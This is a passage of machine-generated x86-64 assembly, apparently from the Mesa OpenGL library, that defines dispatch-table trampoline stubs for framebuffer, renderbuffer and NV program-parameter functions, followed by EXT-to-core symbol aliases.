.type GL_PREFIX(ProgramNamedParameter4fvNV), @function
GL_PREFIX(ProgramNamedParameter4fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5944(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5944(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5944(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5944(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramNamedParameter4fvNV), .-GL_PREFIX(ProgramNamedParameter4fvNV)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_744)
.type GL_PREFIX(_dispatch_stub_744), @function
HIDDEN(GL_PREFIX(_dispatch_stub_744))
GL_PREFIX(_dispatch_stub_744):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5952(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5952(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5952(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5952(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_744), .-GL_PREFIX(_dispatch_stub_744)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_745)
.type GL_PREFIX(_dispatch_stub_745), @function
HIDDEN(GL_PREFIX(_dispatch_stub_745))
GL_PREFIX(_dispatch_stub_745):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5960(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5960(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5960(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5960(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_745), .-GL_PREFIX(_dispatch_stub_745)
.p2align 4,,15
.globl GL_PREFIX(BindFramebufferEXT)
.type GL_PREFIX(BindFramebufferEXT), @function
GL_PREFIX(BindFramebufferEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5968(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5968(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5968(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5968(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BindFramebufferEXT), .-GL_PREFIX(BindFramebufferEXT)
.p2align 4,,15
.globl GL_PREFIX(BindRenderbufferEXT)
.type GL_PREFIX(BindRenderbufferEXT), @function
GL_PREFIX(BindRenderbufferEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5976(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5976(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5976(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5976(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BindRenderbufferEXT), .-GL_PREFIX(BindRenderbufferEXT)
.p2align 4,,15
.globl GL_PREFIX(CheckFramebufferStatusEXT)
.type GL_PREFIX(CheckFramebufferStatusEXT), @function
GL_PREFIX(CheckFramebufferStatusEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5984(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5984(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5984(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5984(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CheckFramebufferStatusEXT), .-GL_PREFIX(CheckFramebufferStatusEXT)
.p2align 4,,15
.globl GL_PREFIX(DeleteFramebuffersEXT)
.type GL_PREFIX(DeleteFramebuffersEXT), @function
GL_PREFIX(DeleteFramebuffersEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5992(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5992(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5992(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5992(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteFramebuffersEXT), .-GL_PREFIX(DeleteFramebuffersEXT)
.p2align 4,,15
.globl GL_PREFIX(DeleteRenderbuffersEXT)
.type GL_PREFIX(DeleteRenderbuffersEXT), @function
GL_PREFIX(DeleteRenderbuffersEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6000(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 6000(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6000(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 6000(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteRenderbuffersEXT), .-GL_PREFIX(DeleteRenderbuffersEXT)
.p2align 4,,15
.globl GL_PREFIX(FramebufferRenderbufferEXT)
.type GL_PREFIX(FramebufferRenderbufferEXT), @function
GL_PREFIX(FramebufferRenderbufferEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6008(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6008(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6008(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6008(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FramebufferRenderbufferEXT), .-GL_PREFIX(FramebufferRenderbufferEXT)
.p2align 4,,15
.globl GL_PREFIX(FramebufferTexture1DEXT)
.type GL_PREFIX(FramebufferTexture1DEXT), @function
GL_PREFIX(FramebufferTexture1DEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6016(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6016(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6016(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6016(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FramebufferTexture1DEXT), .-GL_PREFIX(FramebufferTexture1DEXT)
.p2align 4,,15
.globl GL_PREFIX(FramebufferTexture2DEXT)
.type GL_PREFIX(FramebufferTexture2DEXT), @function
GL_PREFIX(FramebufferTexture2DEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6024(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6024(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6024(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6024(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FramebufferTexture2DEXT), .-GL_PREFIX(FramebufferTexture2DEXT)
.p2align 4,,15
.globl GL_PREFIX(FramebufferTexture3DEXT)
.type GL_PREFIX(FramebufferTexture3DEXT), @function
GL_PREFIX(FramebufferTexture3DEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6032(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6032(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6032(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6032(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FramebufferTexture3DEXT), .-GL_PREFIX(FramebufferTexture3DEXT)
.p2align 4,,15
.globl GL_PREFIX(GenFramebuffersEXT)
.type GL_PREFIX(GenFramebuffersEXT), @function
GL_PREFIX(GenFramebuffersEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6040(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 6040(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6040(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 6040(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenFramebuffersEXT), .-GL_PREFIX(GenFramebuffersEXT)
.p2align 4,,15
.globl GL_PREFIX(GenRenderbuffersEXT)
.type GL_PREFIX(GenRenderbuffersEXT), @function
GL_PREFIX(GenRenderbuffersEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6048(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 6048(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6048(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 6048(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenRenderbuffersEXT), .-GL_PREFIX(GenRenderbuffersEXT)
.p2align 4,,15
.globl GL_PREFIX(GenerateMipmapEXT)
.type GL_PREFIX(GenerateMipmapEXT), @function
GL_PREFIX(GenerateMipmapEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6056(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 6056(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6056(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 6056(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenerateMipmapEXT), .-GL_PREFIX(GenerateMipmapEXT)
.p2align 4,,15
.globl GL_PREFIX(GetFramebufferAttachmentParameterivEXT)
.type GL_PREFIX(GetFramebufferAttachmentParameterivEXT), @function
GL_PREFIX(GetFramebufferAttachmentParameterivEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6064(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6064(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6064(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6064(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetFramebufferAttachmentParameterivEXT), .-GL_PREFIX(GetFramebufferAttachmentParameterivEXT)
.p2align 4,,15
.globl GL_PREFIX(GetRenderbufferParameterivEXT)
.type GL_PREFIX(GetRenderbufferParameterivEXT), @function
GL_PREFIX(GetRenderbufferParameterivEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6072(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 6072(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6072(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 6072(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetRenderbufferParameterivEXT), .-GL_PREFIX(GetRenderbufferParameterivEXT)
.p2align 4,,15
.globl GL_PREFIX(IsFramebufferEXT)
.type GL_PREFIX(IsFramebufferEXT), @function
GL_PREFIX(IsFramebufferEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6080(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 6080(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6080(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 6080(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsFramebufferEXT), .-GL_PREFIX(IsFramebufferEXT)
.p2align 4,,15
.globl GL_PREFIX(IsRenderbufferEXT)
.type GL_PREFIX(IsRenderbufferEXT), @function
GL_PREFIX(IsRenderbufferEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6088(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 6088(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6088(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 6088(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsRenderbufferEXT), .-GL_PREFIX(IsRenderbufferEXT)
.p2align 4,,15
.globl GL_PREFIX(RenderbufferStorageEXT)
.type GL_PREFIX(RenderbufferStorageEXT), @function
GL_PREFIX(RenderbufferStorageEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6096(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6096(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6096(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6096(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RenderbufferStorageEXT), .-GL_PREFIX(RenderbufferStorageEXT)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_763)
.type GL_PREFIX(_dispatch_stub_763), @function
HIDDEN(GL_PREFIX(_dispatch_stub_763))
GL_PREFIX(_dispatch_stub_763):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6104(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6104(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6104(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6104(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_763), .-GL_PREFIX(_dispatch_stub_763)
.p2align 4,,15
.globl GL_PREFIX(FramebufferTextureLayerEXT)
.type GL_PREFIX(FramebufferTextureLayerEXT), @function
GL_PREFIX(FramebufferTextureLayerEXT):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6112(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6112(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6112(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6112(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(FramebufferTextureLayerEXT), .-GL_PREFIX(FramebufferTextureLayerEXT)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_765)
.type GL_PREFIX(_dispatch_stub_765), @function
HIDDEN(GL_PREFIX(_dispatch_stub_765))
GL_PREFIX(_dispatch_stub_765):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6120(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6120(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6120(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6120(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_765), .-GL_PREFIX(_dispatch_stub_765)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_766)
.type GL_PREFIX(_dispatch_stub_766), @function
HIDDEN(GL_PREFIX(_dispatch_stub_766))
GL_PREFIX(_dispatch_stub_766):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6128(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6128(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6128(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6128(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_766), .-GL_PREFIX(_dispatch_stub_766)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_767)
.type GL_PREFIX(_dispatch_stub_767), @function
HIDDEN(GL_PREFIX(_dispatch_stub_767))
GL_PREFIX(_dispatch_stub_767):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6136(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6136(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6136(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 6136(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_767), .-GL_PREFIX(_dispatch_stub_767)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_768)
.type GL_PREFIX(_dispatch_stub_768), @function
HIDDEN(GL_PREFIX(_dispatch_stub_768))
GL_PREFIX(_dispatch_stub_768):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6144(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 6144(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6144(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 6144(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_768), .-GL_PREFIX(_dispatch_stub_768)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_769)
.type GL_PREFIX(_dispatch_stub_769), @function
HIDDEN(GL_PREFIX(_dispatch_stub_769))
GL_PREFIX(_dispatch_stub_769):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 6152(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 6152(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 6152(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 6152(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_769), .-GL_PREFIX(_dispatch_stub_769)
.globl GL_PREFIX(ArrayElementEXT) ; .set GL_PREFIX(ArrayElementEXT), GL_PREFIX(ArrayElement)
.globl GL_PREFIX(BindTextureEXT) ; .set GL_PREFIX(BindTextureEXT), GL_PREFIX(BindTexture)
.globl GL_PREFIX(DrawArraysEXT) ; .set GL_PREFIX(DrawArraysEXT), GL_PREFIX(DrawArrays)
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(AreTexturesResidentEXT) ; .set GL_PREFIX(AreTexturesResidentEXT), GL_PREFIX(AreTexturesResident)
#endif
.globl GL_PREFIX(CopyTexImage1DEXT) ; .set GL_PREFIX(CopyTexImage1DEXT), GL_PREFIX(CopyTexImage1D)
.globl GL_PREFIX(CopyTexImage2DEXT) ; .set GL_PREFIX(CopyTexImage2DEXT), GL_PREFIX(CopyTexImage2D)
.globl GL_PREFIX(CopyTexSubImage1DEXT) ; .set GL_PREFIX(CopyTexSubImage1DEXT), GL_PREFIX(CopyTexSubImage1D)
.globl GL_PREFIX(CopyTexSubImage2DEXT) ; .set GL_PREFIX(CopyTexSubImage2DEXT), GL_PREFIX(CopyTexSubImage2D)
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(DeleteTexturesEXT) ; .set GL_PREFIX(DeleteTexturesEXT), GL_PREFIX(DeleteTextures)
#endif
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(GenTexturesEXT) ; .set GL_PREFIX(GenTexturesEXT), GL_PREFIX(GenTextures)
#endif
.globl GL_PREFIX(GetPointervEXT) ; .set GL_PREFIX(GetPointervEXT), GL_PREFIX(GetPointerv)
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(IsTextureEXT) ; .set GL_PREFIX(IsTextureEXT), GL_PREFIX(IsTexture)
#endif
.globl GL_PREFIX(PrioritizeTexturesEXT) ; .set GL_PREFIX(PrioritizeTexturesEXT), GL_PREFIX(PrioritizeTextures)
.globl GL_PREFIX(TexSubImage1DEXT) ; .set GL_PREFIX(TexSubImage1DEXT), GL_PREFIX(TexSubImage1D)
.globl GL_PREFIX(TexSubImage2DEXT) ; .set GL_PREFIX(TexSubImage2DEXT), GL_PREFIX(TexSubImage2D)
.globl GL_PREFIX(BlendColorEXT) ; .set GL_PREFIX(BlendColorEXT), GL_PREFIX(BlendColor)
.globl GL_PREFIX(BlendEquationEXT) ; .set GL_PREFIX(BlendEquationEXT), GL_PREFIX(BlendEquation)
.globl GL_PREFIX(DrawRangeElementsEXT) ; .set GL_PREFIX(DrawRangeElementsEXT), GL_PREFIX(DrawRangeElements)
.globl GL_PREFIX(ColorTableEXT) ; .set GL_PREFIX(ColorTableEXT), GL_PREFIX(ColorTable)
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(GetColorTableEXT) ; .set GL_PREFIX(GetColorTableEXT), GL_PREFIX(GetColorTable)
#endif
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(GetColorTableParameterfvEXT) ; .set GL_PREFIX(GetColorTableParameterfvEXT), GL_PREFIX(GetColorTableParameterfv)
#endif
#ifndef GLX_INDIRECT_RENDERING
.globl GL_PREFIX(GetColorTableParameterivEXT) ; .set GL_PREFIX(GetColorTableParameterivEXT), GL_PREFIX(GetColorTableParameteriv)
#endif
.globl GL_PREFIX(TexImage3DEXT) ; .set GL_PREFIX(TexImage3DEXT), GL_PREFIX(TexImage3D)
.globl GL_PREFIX(TexSubImage3DEXT) ; .set GL_PREFIX(TexSubImage3DEXT), GL_PREFIX(TexSubImage3D)
.globl GL_PREFIX(CopyTexSubImage3DEXT) ; .set GL_PREFIX(CopyTexSubImage3DEXT), GL_PREFIX(CopyTexSubImage3D)
.globl GL_PREFIX(ActiveTexture) ; .set GL_PREFIX(ActiveTexture), GL_PREFIX(ActiveTextureARB)
